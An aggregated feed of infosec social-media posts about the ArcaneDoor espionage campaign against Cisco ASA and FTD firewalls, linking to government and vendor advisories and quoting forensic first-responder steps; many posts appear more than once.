#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat at 2024-04-25T02:52:31.608Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat at 2024-04-24T19:27:17.460Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

##

screaminggoat at 2024-04-24T19:16:42.383Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat at 2024-04-24T16:53:30.823Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

##

screaminggoat@infosec.exchange at 2024-05-02T14:00:55.000Z ##

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

##

screaminggoat@infosec.exchange at 2024-04-26T20:16:17.000Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-25T02:52:31.000Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat@infosec.exchange at 2024-04-24T19:27:17.000Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

screaminggoat@infosec.exchange at 2024-04-24T19:16:42.000Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-24T16:53:30.000Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

screaminggoat at 2024-05-02T14:00:55.015Z ##

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

##

screaminggoat at 2024-04-26T20:16:17.085Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat at 2024-04-25T02:52:31.608Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat at 2024-04-24T19:27:17.460Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

##

screaminggoat at 2024-04-24T19:16:42.383Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat at 2024-04-24T16:53:30.823Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

##

screaminggoat@infosec.exchange at 2024-05-02T14:00:55.000Z ##

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

##

screaminggoat@infosec.exchange at 2024-04-26T20:16:17.000Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-25T02:52:31.000Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat@infosec.exchange at 2024-04-24T19:27:17.000Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

screaminggoat@infosec.exchange at 2024-04-24T19:16:42.000Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-24T16:53:30.000Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

jos1264@social.skynetcloud.site at 2024-04-24T20:55:04.000Z ##

ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) fortiguard.fortinet.com/threat

##

jos1264@social.skynetcloud.site at 2024-04-24T18:45:04.000Z ##

Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) helpnetsecurity.com/2024/04/24 #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC

##

screaminggoat at 2024-04-24T16:34:11.579Z ##

@GossiTheDog Here are the CVE security advisories:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
##

GossiTheDog@cyberplace.social at 2024-04-24T16:19:22.000Z ##

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

blog.talosintelligence.com/arc

#threatintel #ArcaneDoor

##

screaminggoat at 2024-04-24T16:11:54.051Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

##

screaminggoat@infosec.exchange at 2024-04-24T16:34:11.000Z ##

@GossiTheDog Here are the CVE security advisories:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
##

GossiTheDog@cyberplace.social at 2024-04-24T16:19:22.000Z ##

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

blog.talosintelligence.com/arc

#threatintel #ArcaneDoor

##

screaminggoat@infosec.exchange at 2024-04-24T16:11:54.000Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

